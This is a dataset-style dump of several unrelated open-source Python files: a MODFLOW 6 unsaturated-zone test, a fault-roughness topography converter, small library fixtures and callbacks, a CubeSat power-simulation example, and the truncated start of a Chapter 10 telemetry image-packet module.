autotest/test_gwf_uzf_surfdep.py
|
mkennard-aquaveo/modflow6
|
73a0553636362c90f7d134318e1f5d902dbdc4d3
|
[
"CC0-1.0"
] | null | null | null |
autotest/test_gwf_uzf_surfdep.py
|
mkennard-aquaveo/modflow6
|
73a0553636362c90f7d134318e1f5d902dbdc4d3
|
[
"CC0-1.0"
] | null | null | null |
autotest/test_gwf_uzf_surfdep.py
|
mkennard-aquaveo/modflow6
|
73a0553636362c90f7d134318e1f5d902dbdc4d3
|
[
"CC0-1.0"
] | null | null | null |
import os
import pytest
import sys
import numpy as np
import shutil
import subprocess
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
import targets
mf6_exe = os.path.abspath(targets.target_dict["mf6"])
testname = "uzf_3lay_srfdchk"
testdir = os.path.join("temp", testname)
os.makedirs(testdir, exist_ok=True)
everything_was_successful = True
iuz_cell_dict = {}
cell_iuz_dict = {}
def build_model():
nlay, nrow, ncol = 3, 1, 10
nper = 1
perlen = [20.0]
nstp = [10]
tsmult = len(perlen) * [1.0]
delr = 1.0
delc = 1.0
strt = -25
botm = [
[-5.0, -4.0, -3.0, -3.0, -2.0, -5.0, -4.0, -3.0, -3.0, -2.0],
[-20, -20, -20, -20, -20, -20, -20, -20, -20, -20],
[-30, -30, -30, -30, -30, -30, -30, -30, -30, -30],
]
nouter, ninner = 100, 300
hclose, rclose, relax = 1e-9, 1e-3, 0.97
tdis_rc = []
for i in range(nper):
tdis_rc.append((perlen[i], nstp[i], tsmult[i]))
name = testname
# build MODFLOW 6 files
ws = testdir
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name=mf6_exe, sim_ws=ws
)
# create tdis package
tdis = flopy.mf6.ModflowTdis(
sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
)
# create gwf model
gwf = flopy.mf6.ModflowGwf(
sim, modelname=name, newtonoptions="NEWTON", save_flows=True
)
# create iterative model solution and register the gwf model with it
ims = flopy.mf6.ModflowIms(
sim,
print_option="SUMMARY",
complexity="MODERATE",
outer_dvclose=hclose,
outer_maximum=nouter,
under_relaxation="DBD",
inner_maximum=ninner,
inner_dvclose=hclose,
rcloserecord=rclose,
linear_acceleration="BICGSTAB",
scaling_method="NONE",
reordering_method="NONE",
relaxation_factor=relax,
)
sim.register_ims_package(ims, [gwf.name])
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delc,
top=0.0,
botm=botm,
)
# initial conditions
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
# node property flow
npf = flopy.mf6.ModflowGwfnpf(
gwf, save_flows=True, icelltype=1, k=100.0, k33=10
)
# aquifer storage
sto = flopy.mf6.ModflowGwfsto(
gwf, iconvert=1, ss=1e-5, sy=0.2, transient=True
)
# chd files
chdval = -3.0
chdspd = {0: [[(2, 0, 0), chdval]]}
chd = flopy.mf6.ModflowGwfchd(
gwf, print_flows=True, stress_period_data=chdspd
)
# transient uzf info
# iuzno cellid landflg ivertcn surfdp vks thtr thts thti eps [bndnm]
uzf_pkdat = [
[0, (0, 0, 1), 1, 8, 6, 1, 0.05, 0.35, 0.05, 4, "uzf01"],
[1, (0, 0, 2), 1, 9, 6, 1, 0.05, 0.35, 0.05, 4, "uzf02"],
[2, (0, 0, 3), 1, 10, 6, 1, 0.05, 0.35, 0.05, 4, "uzf03"],
[3, (0, 0, 4), 1, 11, 6, 1, 0.05, 0.35, 0.05, 4, "uzf04"],
[4, (0, 0, 5), 1, 12, 6, 1, 0.05, 0.35, 0.05, 4, "uzf05"],
[5, (0, 0, 6), 1, 13, 6, 1, 0.05, 0.35, 0.05, 4, "uzf06"],
[6, (0, 0, 7), 1, 14, 6, 1, 0.05, 0.35, 0.05, 4, "uzf07"],
[7, (0, 0, 8), 1, 15, 6, 1, 0.05, 0.35, 0.05, 4, "uzf08"],
[8, (1, 0, 1), 0, 16, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf08"],
[9, (1, 0, 2), 0, 17, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf10"],
[10, (1, 0, 3), 0, 18, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf11"],
[11, (1, 0, 4), 0, 19, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf12"],
[12, (1, 0, 5), 0, 20, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf13"],
[13, (1, 0, 6), 0, 21, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf14"],
[14, (1, 0, 7), 0, 22, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf15"],
[15, (1, 0, 8), 0, 23, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf16"],
[16, (2, 0, 1), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf17"],
[17, (2, 0, 2), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf18"],
[18, (2, 0, 3), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf19"],
[19, (2, 0, 4), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf20"],
[20, (2, 0, 5), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf21"],
[21, (2, 0, 6), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf22"],
[22, (2, 0, 7), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf23"],
[23, (2, 0, 8), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf24"],
]
for itm in uzf_pkdat:
iuz_cell_dict.update({itm[0]: (itm[1][0], itm[1][1], itm[1][2])})
cell_iuz_dict.update({(itm[1][0], itm[1][1], itm[1][2]): itm[0]})
extdp = 15.0
pet = 0.001
zero = 0.0
uzf_spd = {
0: [
[0, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[1, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[2, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[3, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[4, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[5, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[6, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[7, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[8, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[9, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[10, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[11, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[12, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[13, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[14, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[15, zero, pet, extdp, 7.0e-02, zero, zero, zero],
]
}
uzf = flopy.mf6.ModflowGwfuzf(
gwf,
print_flows=True,
save_flows=True,
simulate_et=True,
simulate_gwseep=True,
linear_gwet=True,
boundnames=True,
ntrailwaves=15,
nwavesets=40,
nuzfcells=len(uzf_pkdat),
packagedata=uzf_pkdat,
perioddata=uzf_spd,
budget_filerecord="{}.uzf.bud".format(name),
filename="{}.uzf".format(name),
)
# output control
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(name),
head_filerecord="{}.hds".format(name),
headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")],
saverecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
filename="{}.oc".format(name),
)
return sim
# - No need to change any code below
def test_mf6model():
# build and run the test model
sim = build_model()
sim.write_simulation()
sim.run_simulation()
# ensure that the error msg is contained in the mfsim.lst file
f = open(os.path.join(testdir, "mfsim.lst"), "r")
lines = f.readlines()
error_count = 0
expected_msg = False
for line in lines:
if "SURFDEP" and "cannot" in line:
expected_msg = True
error_count += 1
assert error_count == 8, (
"error count = " + str(error_count) + "but should equal 8"
)
print("Finished running surfdep check")
return
def main():
# build and run the test model
sim = build_model()
sim.write_simulation()
sim.run_simulation()
# ensure that the error msg is contained in the mfsim.lst file
f = open(os.path.join(testdir, "mfsim.lst"), "r")
lines = f.readlines()
error_count = 0
expected_msg = False
for line in lines:
if "SURFDEP" and "cannot" in line:
expected_msg = True
error_count += 1
assert error_count == 8, (
"error count = " + str(error_count) + "but should equal 8"
)
print("Finished running surfdep check")
return
if __name__ == "__main__":
# print message
print("standalone run of {}".format(os.path.basename(__file__)))
# run main routine
main()
| 30.665441
| 79
| 0.531111
|
import os
import pytest
import sys
import numpy as np
import shutil
import subprocess
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
import targets
mf6_exe = os.path.abspath(targets.target_dict["mf6"])
testname = "uzf_3lay_srfdchk"
testdir = os.path.join("temp", testname)
os.makedirs(testdir, exist_ok=True)
everything_was_successful = True
iuz_cell_dict = {}
cell_iuz_dict = {}
def build_model():
nlay, nrow, ncol = 3, 1, 10
nper = 1
perlen = [20.0]
nstp = [10]
tsmult = len(perlen) * [1.0]
delr = 1.0
delc = 1.0
strt = -25
botm = [
[-5.0, -4.0, -3.0, -3.0, -2.0, -5.0, -4.0, -3.0, -3.0, -2.0],
[-20, -20, -20, -20, -20, -20, -20, -20, -20, -20],
[-30, -30, -30, -30, -30, -30, -30, -30, -30, -30],
]
nouter, ninner = 100, 300
hclose, rclose, relax = 1e-9, 1e-3, 0.97
tdis_rc = []
for i in range(nper):
tdis_rc.append((perlen[i], nstp[i], tsmult[i]))
name = testname
ws = testdir
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name=mf6_exe, sim_ws=ws
)
tdis = flopy.mf6.ModflowTdis(
sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
)
gwf = flopy.mf6.ModflowGwf(
sim, modelname=name, newtonoptions="NEWTON", save_flows=True
)
ims = flopy.mf6.ModflowIms(
sim,
print_option="SUMMARY",
complexity="MODERATE",
outer_dvclose=hclose,
outer_maximum=nouter,
under_relaxation="DBD",
inner_maximum=ninner,
inner_dvclose=hclose,
rcloserecord=rclose,
linear_acceleration="BICGSTAB",
scaling_method="NONE",
reordering_method="NONE",
relaxation_factor=relax,
)
sim.register_ims_package(ims, [gwf.name])
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delc,
top=0.0,
botm=botm,
)
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
npf = flopy.mf6.ModflowGwfnpf(
gwf, save_flows=True, icelltype=1, k=100.0, k33=10
)
sto = flopy.mf6.ModflowGwfsto(
gwf, iconvert=1, ss=1e-5, sy=0.2, transient=True
)
chdval = -3.0
chdspd = {0: [[(2, 0, 0), chdval]]}
chd = flopy.mf6.ModflowGwfchd(
gwf, print_flows=True, stress_period_data=chdspd
)
uzf_pkdat = [
[0, (0, 0, 1), 1, 8, 6, 1, 0.05, 0.35, 0.05, 4, "uzf01"],
[1, (0, 0, 2), 1, 9, 6, 1, 0.05, 0.35, 0.05, 4, "uzf02"],
[2, (0, 0, 3), 1, 10, 6, 1, 0.05, 0.35, 0.05, 4, "uzf03"],
[3, (0, 0, 4), 1, 11, 6, 1, 0.05, 0.35, 0.05, 4, "uzf04"],
[4, (0, 0, 5), 1, 12, 6, 1, 0.05, 0.35, 0.05, 4, "uzf05"],
[5, (0, 0, 6), 1, 13, 6, 1, 0.05, 0.35, 0.05, 4, "uzf06"],
[6, (0, 0, 7), 1, 14, 6, 1, 0.05, 0.35, 0.05, 4, "uzf07"],
[7, (0, 0, 8), 1, 15, 6, 1, 0.05, 0.35, 0.05, 4, "uzf08"],
[8, (1, 0, 1), 0, 16, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf08"],
[9, (1, 0, 2), 0, 17, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf10"],
[10, (1, 0, 3), 0, 18, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf11"],
[11, (1, 0, 4), 0, 19, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf12"],
[12, (1, 0, 5), 0, 20, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf13"],
[13, (1, 0, 6), 0, 21, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf14"],
[14, (1, 0, 7), 0, 22, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf15"],
[15, (1, 0, 8), 0, 23, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf16"],
[16, (2, 0, 1), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf17"],
[17, (2, 0, 2), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf18"],
[18, (2, 0, 3), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf19"],
[19, (2, 0, 4), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf20"],
[20, (2, 0, 5), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf21"],
[21, (2, 0, 6), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf22"],
[22, (2, 0, 7), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf23"],
[23, (2, 0, 8), 0, -1, 0.1, 1, 0.05, 0.35, 0.05, 4, "uzf24"],
]
for itm in uzf_pkdat:
iuz_cell_dict.update({itm[0]: (itm[1][0], itm[1][1], itm[1][2])})
cell_iuz_dict.update({(itm[1][0], itm[1][1], itm[1][2]): itm[0]})
extdp = 15.0
pet = 0.001
zero = 0.0
uzf_spd = {
0: [
[0, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[1, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[2, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[3, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[4, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[5, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[6, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[7, 0.01, pet, extdp, 7.0e-02, zero, zero, zero],
[8, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[9, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[10, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[11, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[12, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[13, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[14, zero, pet, extdp, 7.0e-02, zero, zero, zero],
[15, zero, pet, extdp, 7.0e-02, zero, zero, zero],
]
}
uzf = flopy.mf6.ModflowGwfuzf(
gwf,
print_flows=True,
save_flows=True,
simulate_et=True,
simulate_gwseep=True,
linear_gwet=True,
boundnames=True,
ntrailwaves=15,
nwavesets=40,
nuzfcells=len(uzf_pkdat),
packagedata=uzf_pkdat,
perioddata=uzf_spd,
budget_filerecord="{}.uzf.bud".format(name),
filename="{}.uzf".format(name),
)
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(name),
head_filerecord="{}.hds".format(name),
headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")],
saverecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
filename="{}.oc".format(name),
)
return sim
def test_mf6model():
sim = build_model()
sim.write_simulation()
sim.run_simulation()
f = open(os.path.join(testdir, "mfsim.lst"), "r")
lines = f.readlines()
error_count = 0
expected_msg = False
for line in lines:
if "SURFDEP" and "cannot" in line:
expected_msg = True
error_count += 1
assert error_count == 8, (
"error count = " + str(error_count) + "but should equal 8"
)
print("Finished running surfdep check")
return
def main():
sim = build_model()
sim.write_simulation()
sim.run_simulation()
f = open(os.path.join(testdir, "mfsim.lst"), "r")
lines = f.readlines()
error_count = 0
expected_msg = False
for line in lines:
if "SURFDEP" and "cannot" in line:
expected_msg = True
error_count += 1
assert error_count == 8, (
"error count = " + str(error_count) + "but should equal 8"
)
print("Finished running surfdep check")
return
if __name__ == "__main__":
print("standalone run of {}".format(os.path.basename(__file__)))
main()
| true
| true
|
f70522e7e78a3344ab563ab228f5eece99510bcf
| 584
|
py
|
Python
|
tpv29/generate_mytopo_tpv29.py
|
sebwolf-de/Examples
|
329db390d540e6f5fe1dff35372528f723882271
|
[
"BSD-3-Clause"
] | 3
|
2021-08-16T12:57:52.000Z
|
2021-11-02T23:39:36.000Z
|
tpv29/generate_mytopo_tpv29.py
|
sebwolf-de/Examples
|
329db390d540e6f5fe1dff35372528f723882271
|
[
"BSD-3-Clause"
] | 22
|
2020-09-25T12:52:04.000Z
|
2022-02-09T14:51:20.000Z
|
tpv29/generate_mytopo_tpv29.py
|
sebwolf-de/Examples
|
329db390d540e6f5fe1dff35372528f723882271
|
[
"BSD-3-Clause"
] | 11
|
2018-10-11T09:04:42.000Z
|
2021-12-06T17:17:39.000Z
|
import numpy as np
# Read scec input file
fid = open("tpv29_tpv30_geometry_25m_data.txt")
line = fid.readline()
line = fid.readline()
header = [float(a) for a in line.split()]
nx, ny, lx, ly = header
roughness = np.loadtxt(fid)
roughness = roughness[:, 4]
fid.close()
# create x and y vectors
x = np.linspace(-lx / 2, lx / 2, int(nx) + 1)
y = np.linspace(0, ly, int(ny) + 1)
# write mytopo_tpv29
fout = open("mytopo_tpv29", "w")
fout.write("%d %d\n" % (nx + 1, ny + 1))
np.savetxt(fout, x, fmt="%f")
np.savetxt(fout, y, fmt="%f")
np.savetxt(fout, roughness, fmt="%f")
fout.close()
| 24.333333
| 47
| 0.64726
|
import numpy as np
fid = open("tpv29_tpv30_geometry_25m_data.txt")
line = fid.readline()
line = fid.readline()
header = [float(a) for a in line.split()]
nx, ny, lx, ly = header
roughness = np.loadtxt(fid)
roughness = roughness[:, 4]
fid.close()
x = np.linspace(-lx / 2, lx / 2, int(nx) + 1)
y = np.linspace(0, ly, int(ny) + 1)
fout = open("mytopo_tpv29", "w")
fout.write("%d %d\n" % (nx + 1, ny + 1))
np.savetxt(fout, x, fmt="%f")
np.savetxt(fout, y, fmt="%f")
np.savetxt(fout, roughness, fmt="%f")
fout.close()
| true
| true
|
f70523fc884ca9381af67d78c3f7c35fb8498822
| 284
|
py
|
Python
|
tests/client/test_inmemory/conftest.py
|
zyfra/ebonite
|
b01b662c43709d152940f488574d78ff25f89ecf
|
[
"Apache-2.0"
] | 270
|
2019-11-14T15:46:08.000Z
|
2021-09-17T16:43:03.000Z
|
tests/client/test_inmemory/conftest.py
|
leepand/ebonite
|
b01b662c43709d152940f488574d78ff25f89ecf
|
[
"Apache-2.0"
] | 14
|
2019-11-29T11:49:39.000Z
|
2022-02-10T00:23:59.000Z
|
tests/client/test_inmemory/conftest.py
|
leepand/ebonite
|
b01b662c43709d152940f488574d78ff25f89ecf
|
[
"Apache-2.0"
] | 18
|
2019-11-22T13:15:14.000Z
|
2021-09-01T13:36:12.000Z
|
import pytest
from ebonite.client import Ebonite
from tests.client.conftest import create_client_hooks
@pytest.fixture
def inmemory_ebnt():
ebnt = Ebonite.inmemory()
yield ebnt
pytest_runtest_protocol, pytest_collect_file = create_client_hooks(inmemory_ebnt, 'inmemory')
| 20.285714
| 93
| 0.806338
|
import pytest
from ebonite.client import Ebonite
from tests.client.conftest import create_client_hooks
@pytest.fixture
def inmemory_ebnt():
ebnt = Ebonite.inmemory()
yield ebnt
pytest_runtest_protocol, pytest_collect_file = create_client_hooks(inmemory_ebnt, 'inmemory')
| true
| true
|
f70524256bdfc9b0876254c7efcadd8c12f51182
| 3,165
|
py
|
Python
|
example1.py
|
srujan71/CubeSat-Mission-Planner
|
34030254109def0b13e82116ed5122ecf79a82f7
|
[
"MIT"
] | 1
|
2021-07-26T16:17:30.000Z
|
2021-07-26T16:17:30.000Z
|
example1.py
|
leizhang2020/CubeSat-Mission-Planner
|
62d1ad33c2dcb1a2f8fb3ff615cc5cc0e6716969
|
[
"MIT"
] | null | null | null |
example1.py
|
leizhang2020/CubeSat-Mission-Planner
|
62d1ad33c2dcb1a2f8fb3ff615cc5cc0e6716969
|
[
"MIT"
] | 2
|
2021-09-18T08:50:44.000Z
|
2022-01-20T02:41:38.000Z
|
"""
example1.py
"A simple example how to use the CubeSat-Power-Estimation tool."
@author: Johan Monster (https://github.com/Hans-Bananendans/)
"""
# Import packages
import numpy as np
import pandas as pd
from mission import Mission
# Defining the config
config = {
"years_passed" : 0, # How many [years] the satellite has been in space for
"battery_capacity" : 81000, # Battery capacity in [W.s] (or: Joule)
"battery_degradation_factor" : 0.04,
"battery_init" : 0.5, # 0.5 = Battery begins at 50% charge
"panel_degradation_factor" : 0.02,
"blip_period" : 30, # Currently unused, telemetry blip period
"blip_duration" : 1, # Currently unused, telemetry blip duration
"no_blips" : ["downlink"], # Currently unused
"orbital_altitude" : 550 # Orbital altitude in [km]
}
# List of the names of all used EPS channels.
channels = ["None", "5V_1", "5V_2", "5V_3", "5V_4", "3.3V_1", \
"3.3V_2", "3.3V_3", "3.3V_4", "Var_rail"]
# Dict of typical voltage supplied to each channel.
channel_voltages = {
"5V_1" : 5,
"5V_2" : 5,
"5V_3" : 5,
"5V_4" : 5,
"3.3V_1" : 3.3,
"3.3V_2" : 3.3,
"3.3V_3" : 3.3,
"3.3V_4" : 3.3,
"Var_rail" : 6.5 # Can between 6.5-8 VDC, highest current is at 6.5V
}
# Dict specifiying which device is on which EPS channel
device_channels = {
"adcs" : "5V_4",
"payload_dice" : "5V_3",
"payload_bitflip" : "3.3V_3",
"antenna" : "3.3V_4",
"obc" : "5V_2",
"obc_board" : "5V_2",
"rx" : "Var_rail",
"tx" : "Var_rail",
"eps" : "None",
"sensors_1" : "3.3V_2",
"sensors_2" : "3.3V_4",
}
# List of all possible OpStates the satellite can be in.
# This list must be consistent with the specified power.xlsx
state_list = ["idle","recharge","dice_payload","wheel_unloading", \
"transponder","downlink","safe_mode","recovery_mode", \
"detumbling_mode"]
# Dict of which colour will be used for each OpState whilst plotting
state_colours = {
"idle" : "#ffffff",
"recharge" : "#2ca02c",
"dice_payload" : "#8000ff",
"wheel_unloading" : "#0080ff",
"transponder" : "#ff8000",
"downlink" : "#ff0000",
"safe_mode" : "#4000ff",
"recovery_mode" : "#777777",
"detumbling_mode" : "#ff00ff"
}
# Baby's first satellite schedule
schedule1 = {
0 : "idle",
50 : "downlink",
100 : "recharge"
}
# Loading the power frame, or the device/OpState table
power_frame = pd.read_excel('power.xlsx',index_col=0)
# Loading the two power input vectors, generated by CubeSat-Solar-Estimator
p_sun = np.load("P_sun.npy")
p_alb = np.load("P_alb.npy")
# Assembling the mission object
m1 = Mission(config, device_channels, state_list, channels, \
power_frame, p_sun, p_alb)
# Calling the Mission.propagate() method to start the simulation
results = m1.propagate(schedule1, tsim=200, dt=1)
# Plotting
m1.plot_timeline_power(state_colours)
| 29.858491
| 78
| 0.594945
|
import numpy as np
import pandas as pd
from mission import Mission
config = {
"years_passed" : 0,
"battery_capacity" : 81000,
"battery_degradation_factor" : 0.04,
"battery_init" : 0.5,
"panel_degradation_factor" : 0.02,
"blip_period" : 30,
"blip_duration" : 1,
"no_blips" : ["downlink"],
"orbital_altitude" : 550
}
channels = ["None", "5V_1", "5V_2", "5V_3", "5V_4", "3.3V_1", \
"3.3V_2", "3.3V_3", "3.3V_4", "Var_rail"]
channel_voltages = {
"5V_1" : 5,
"5V_2" : 5,
"5V_3" : 5,
"5V_4" : 5,
"3.3V_1" : 3.3,
"3.3V_2" : 3.3,
"3.3V_3" : 3.3,
"3.3V_4" : 3.3,
"Var_rail" : 6.5
}
device_channels = {
"adcs" : "5V_4",
"payload_dice" : "5V_3",
"payload_bitflip" : "3.3V_3",
"antenna" : "3.3V_4",
"obc" : "5V_2",
"obc_board" : "5V_2",
"rx" : "Var_rail",
"tx" : "Var_rail",
"eps" : "None",
"sensors_1" : "3.3V_2",
"sensors_2" : "3.3V_4",
}
state_list = ["idle","recharge","dice_payload","wheel_unloading", \
"transponder","downlink","safe_mode","recovery_mode", \
"detumbling_mode"]
state_colours = {
"idle" : "#ffffff",
"recharge" : "#2ca02c",
"dice_payload" : "#8000ff",
"wheel_unloading" : "#0080ff",
"transponder" : "#ff8000",
"downlink" : "#ff0000",
"safe_mode" : "#4000ff",
"recovery_mode" : "#777777",
"detumbling_mode" : "#ff00ff"
}
schedule1 = {
0 : "idle",
50 : "downlink",
100 : "recharge"
}
# Loading the power frame, or the device/OpState table
power_frame = pd.read_excel('power.xlsx',index_col=0)
# Loading the two power input vectors, generated by CubeSat-Solar-Estimator
p_sun = np.load("P_sun.npy")
p_alb = np.load("P_alb.npy")
# Assembling the mission object
m1 = Mission(config, device_channels, state_list, channels, \
power_frame, p_sun, p_alb)
# Calling the Mission.propagate() method to start the simulation
results = m1.propagate(schedule1, tsim=200, dt=1)
# Plotting
m1.plot_timeline_power(state_colours)
| true
| true
|
f7052438c8473f910759ed0cf1b17b8320d04873
| 653
|
py
|
Python
|
coredis/response/callbacks/acl.py
|
alisaifee/aredis
|
c5764a5a2a29c4ed25278548aa54eece94974440
|
[
"MIT"
] | null | null | null |
coredis/response/callbacks/acl.py
|
alisaifee/aredis
|
c5764a5a2a29c4ed25278548aa54eece94974440
|
[
"MIT"
] | null | null | null |
coredis/response/callbacks/acl.py
|
alisaifee/aredis
|
c5764a5a2a29c4ed25278548aa54eece94974440
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from coredis.response.callbacks import (
DictCallback,
ResponseCallback,
SimpleStringCallback,
)
from coredis.response.utils import flat_pairs_to_dict
from coredis.typing import Any, AnyStr, Mapping, Tuple, Union
class ACLLogCallback(ResponseCallback):
def transform(
self, response: Any, **options: Any
) -> Union[bool, Tuple[Mapping[AnyStr, AnyStr], ...]]:
if options.get("reset"):
return SimpleStringCallback()(response)
else:
return tuple(
DictCallback(transform_function=flat_pairs_to_dict)(r) for r in response
)
| 29.681818
| 88
| 0.679939
|
from __future__ import annotations
from coredis.response.callbacks import (
DictCallback,
ResponseCallback,
SimpleStringCallback,
)
from coredis.response.utils import flat_pairs_to_dict
from coredis.typing import Any, AnyStr, Mapping, Tuple, Union
class ACLLogCallback(ResponseCallback):
def transform(
self, response: Any, **options: Any
) -> Union[bool, Tuple[Mapping[AnyStr, AnyStr], ...]]:
if options.get("reset"):
return SimpleStringCallback()(response)
else:
return tuple(
DictCallback(transform_function=flat_pairs_to_dict)(r) for r in response
)
| true
| true
|
f705245746d0ebe045665a381e0da85b1675e0cb
| 297
|
py
|
Python
|
tensornetwork/component_factory.py
|
gazay/TensorNetwork
|
1564a24d6fef6d6ecd90dc01b55a5aa3f5d71b8e
|
[
"Apache-2.0"
] | 2
|
2019-11-22T20:03:47.000Z
|
2020-09-03T20:25:51.000Z
|
tensornetwork/component_factory.py
|
gazay/TensorNetwork
|
1564a24d6fef6d6ecd90dc01b55a5aa3f5d71b8e
|
[
"Apache-2.0"
] | null | null | null |
tensornetwork/component_factory.py
|
gazay/TensorNetwork
|
1564a24d6fef6d6ecd90dc01b55a5aa3f5d71b8e
|
[
"Apache-2.0"
] | 3
|
2020-04-27T10:28:21.000Z
|
2021-03-02T10:02:14.000Z
|
from tensornetwork.network_components import Node, CopyNode, Edge
_COMPONENTS = {
"Node": Node,
"CopyNode": CopyNode,
"Edge": Edge,
}
def get_component(name):
if name not in _COMPONENTS:
raise ValueError("Component {} does not exist".format(name))
return _COMPONENTS[name]
| 19.8
| 65
| 0.703704
|
from tensornetwork.network_components import Node, CopyNode, Edge
_COMPONENTS = {
"Node": Node,
"CopyNode": CopyNode,
"Edge": Edge,
}
def get_component(name):
if name not in _COMPONENTS:
raise ValueError("Component {} does not exist".format(name))
return _COMPONENTS[name]
| true
| true
|
f7052482790afe437f8491bcd68bb6a5d319ef0d
| 3,563
|
py
|
Python
|
chapter10/image.py
|
atac-bham/pychapter10
|
292f15162d4a637144ab0e64ed7215a4ab4f37df
|
[
"BSD-3-Clause"
] | 7
|
2021-04-27T12:14:42.000Z
|
2021-11-17T08:31:19.000Z
|
chapter10/image.py
|
atac-bham/pychapter10
|
292f15162d4a637144ab0e64ed7215a4ab4f37df
|
[
"BSD-3-Clause"
] | 26
|
2020-07-20T21:28:57.000Z
|
2022-02-17T13:36:03.000Z
|
chapter10/image.py
|
atac-bham/pychapter10
|
292f15162d4a637144ab0e64ed7215a4ab4f37df
|
[
"BSD-3-Clause"
] | null | null | null |
from .util import BitFormat
from . import packet
__all__ = ('ImageF0', 'ImageF1', 'ImageF2')
class ImageMessage:
def __repr__(self):
return '<Image Segment>'
class ImageF0(packet.Packet):
"""Image data
.. py:attribute:: segment_length
.. py:attribute:: iph
.. py:attribute:: sum
* 0 - Less than one complete image
* 1 - One complete image
* 2 - Multiple complete images
* 3 - Multiple incomplete images
.. py:attribute:: parts
Indicates which piece[s] are of the frame are contained in the packet:
"""
csdw_format = BitFormat('''
u27 length
u1 iph
u3 sum
u3 parts''')
class Message(packet.Message, ImageMessage):
"""
.. py:attribute:: ipts
If IPH is true (see above), containts intra-packet timestamp
"""
def __init__(self, *args, **kwargs):
